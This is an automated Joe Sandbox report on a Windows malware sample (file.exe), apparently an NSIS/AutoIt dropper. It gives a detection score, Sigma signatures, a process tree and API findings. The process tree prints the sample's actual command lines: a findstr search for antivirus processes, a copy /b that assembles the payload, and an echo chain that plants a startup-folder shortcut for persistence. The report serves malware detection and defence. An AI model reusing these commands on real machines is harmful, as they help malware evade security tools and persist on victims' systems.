Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523781
MD5:db7b43084f7a44e3290774e36d49ce41
SHA1:1e1321a6e0c6f63b719daccdacbde4a10547021e
SHA256:a6da6ca04ee56f1e10dc25c07f938300fff7b3c1b50abe925b5f2b10b084216b
Tags:exeuser-Bitsight
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2504 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DB7B43084F7A44E3290774E36D49CE41)
    • cmd.exe (PID: 1368 cmdline: "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3428 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2872 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 824 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2008 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2688 cmdline: cmd /c md 182349 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5752 cmdline: findstr /V "RefundAlienConservativeChapters" Coral MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6640 cmdline: cmd /c copy /b ..\Cause + ..\Shopper + ..\Edges + ..\Zinc + ..\Correlation + ..\Wearing + ..\Provision + ..\Res l MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Beginners.pif (PID: 7092 cmdline: Beginners.pif l MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 1900 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 5996 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 2416 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TradeHub.scr (PID: 1460 cmdline: "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\z" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , ProcessId: 2416, ProcessName: wscript.exe
Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Beginners.pif l, CommandLine: Beginners.pif l, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: Beginners.pif l, ProcessId: 7092, ProcessName: Beginners.pif
Sigma detected: SCR File Write Event
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr
Sigma detected: Suspicious Screensaver Binary File Creation
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" , ProcessId: 2416, ProcessName: wscript.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 1900, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url

HIPS / PFW / Operating System Protection Evasion

barindex
Sigma detected: Search for Antivirus process
Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1368, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 2008, ProcessName: findstr.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifVirustotal: Detection: 10%Perma Link
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted file
Source: file.exeVirustotal: Detection: 16%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.5% probability
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00114005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00114005
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_0011494A
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00113CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00113CE2
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0011C2FF
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011CD14 FindFirstFileW,FindClose,10_2_0011CD14
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0011CD9F
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0011F5D8
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0011F735
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0011FA36
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DC4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00DC4005
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DC494A GetFileAttributesW,FindFirstFileW,FindClose,15_2_00DC494A
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_00DCC2FF
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_00DCCD9F
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCCD14 FindFirstFileW,FindClose,15_2_00DCCD14
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_00DCF5D8
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_00DCF735
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_00DCFA36
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DC3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00DC3CE2
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\182349\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\182349Jump to behavior
Source: unknownDNS traffic detected: query: bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_001229BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_001229BA
Source: global trafficDNS traffic detected: DNS query: bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: file.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000000.1687736473.0000000000179000.00000002.00000001.01000000.00000006.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr, 0000000F.00000002.3506982744.0000000000E29000.00000002.00000001.01000000.00000008.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Sp.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00124830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00124830
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DD4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_00DD4830
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00124632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00124632
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0013D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0013D164
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DED164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,15_2_00DED164

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00114254: CreateFileW,DeviceIoControl,CloseHandle,10_2_00114254
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00108F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00108F2E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00115778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00115778
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DC5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_00DC5778
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\AdoptionSectionsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\AdvisorUsbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\ProminentSavingsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\ValuablePeninsulaJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000BB02010_2_000BB020
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000B94E010_2_000B94E0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000B9C8010_2_000B9C80
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D23F510_2_000D23F5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0013840010_2_00138400
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000E650210_2_000E6502
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000E265E10_2_000E265E
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000BE6F010_2_000BE6F0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D282A10_2_000D282A
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000E89BF10_2_000E89BF
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00130A3A10_2_00130A3A
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000E6A7410_2_000E6A74
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000C0BE010_2_000C0BE0
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000DCD5110_2_000DCD51
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0010EDB210_2_0010EDB2
